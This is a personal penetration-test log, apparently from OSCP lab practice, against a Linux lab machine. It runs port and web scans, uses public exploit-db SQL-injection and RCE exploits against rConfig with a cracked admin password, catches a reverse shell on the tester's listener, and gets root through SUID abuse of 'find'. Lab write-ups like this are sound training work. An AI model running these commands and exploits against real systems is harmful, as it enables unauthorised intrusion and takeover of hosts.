🧪 Pentest Log: {{date:2025-08-16}}

🔍 Target Information

• Machine Name: Quackerjack
• IP Address: 192.168.182.57
• Operating System: Linux

ip=192.168.182.57

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Port 8081

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Google search "rconfig version 3.9 4 exploit", found

https://www.exploit-db.com/exploits/48208

https://www.exploit-db.com/exploits/48241

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 8081
• Vulnerability Type: SQLI, RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

Add

request.verify=False

in both exploitdb scripts

python3 48208.py https://$ip:8081

Found admin md5 hash, crack it using crackstation

admin:abgrtyu

python3 48241.py https://$ip:8081 admin abgrtyu 192.168.45.163 8081

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 8081

🧬 Privilege Escalation

👤 Current Access

• User: apache
• Groups: 48(apache)
• Shell Type: reverse shell

🔍 Enumeration

SUID Files

find / -type f -perm -4000 2>/dev/null

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: SUID Abuse
• Target Binary/Service: find
• Reference / Source: GTFOBins

🔧 Exploit Steps

• Smash to root

/usr/bin/find . -exec /bin/sh -p \; -quit